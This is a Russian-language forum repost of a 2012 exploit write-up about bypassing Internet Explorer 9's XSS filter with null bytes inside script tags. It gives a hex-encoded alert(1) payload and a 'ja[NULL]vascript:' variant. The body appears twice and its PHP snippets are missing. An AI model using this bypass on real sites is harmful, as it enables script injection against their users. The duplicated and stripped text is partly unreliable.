Unknown
18.10.2012, 17:58
В Internet Explorer 9, ввели защиту от XSS, при написании в GET параметре скрипта, например alert(), у нас выведется окно "счастья":
http://s51.radikal.ru/i134/1210/2f/9b5e7457334d.png
Давайте проведем пару тестов, допустим у нас есть php скрипт с содержимым:
PHP:
Сохраним его под имен xss_ie.php, и пробуем:
PHP:
test.ru/xss_ie.php?a=alert(1)
PHP:
test.ru/xss_ie.php?a=alert(1)
Ни при первом, ни при втором варианте окно выведено не будет, благодаря все тому же фильтру.
PoC:
Что казалось можно взять с фильтрации, но если вы вспомните, что IE позволяет зачищать теги вставив 0-байт, то все у вас получится. Например, этот код будет выполнен:
Code:
3C 73 00 63 72 69 70 74 3E 61 6C 65 72 74 28 31 29 3C 2F 73 00 63 72 69 70 74 3E
Этот же код, в человеко понятном виде: "alert(1)"
И вот, что мы получаем. Создаем скрипт с содержимым:
PHP:
alert(1)'>Clickme
Где xss_ie.php скрипт, который мы создали в начале.
После всего получаем:
http://s16.radikal.ru/i190/1210/05/61ce0b8876e6.png
P.S. с "ja[NULL]vascript:" этот вариант тоже канает.
Источник: 1337day.com (http://www.1337day.com/exploit/description/19579)
Author: Jean Pascal Pereira
Date: 2012-05-15
http://s51.radikal.ru/i134/1210/2f/9b5e7457334d.png
Давайте проведем пару тестов, допустим у нас есть php скрипт с содержимым:
PHP:
Сохраним его под имен xss_ie.php, и пробуем:
PHP:
test.ru/xss_ie.php?a=alert(1)
PHP:
test.ru/xss_ie.php?a=alert(1)
Ни при первом, ни при втором варианте окно выведено не будет, благодаря все тому же фильтру.
PoC:
Что казалось можно взять с фильтрации, но если вы вспомните, что IE позволяет зачищать теги вставив 0-байт, то все у вас получится. Например, этот код будет выполнен:
Code:
3C 73 00 63 72 69 70 74 3E 61 6C 65 72 74 28 31 29 3C 2F 73 00 63 72 69 70 74 3E
Этот же код, в человеко понятном виде: "alert(1)"
И вот, что мы получаем. Создаем скрипт с содержимым:
PHP:
alert(1)'>Clickme
Где xss_ie.php скрипт, который мы создали в начале.
После всего получаем:
http://s16.radikal.ru/i190/1210/05/61ce0b8876e6.png
P.S. с "ja[NULL]vascript:" этот вариант тоже канает.
Источник: 1337day.com (http://www.1337day.com/exploit/description/19579)
Author: Jean Pascal Pereira
Date: 2012-05-15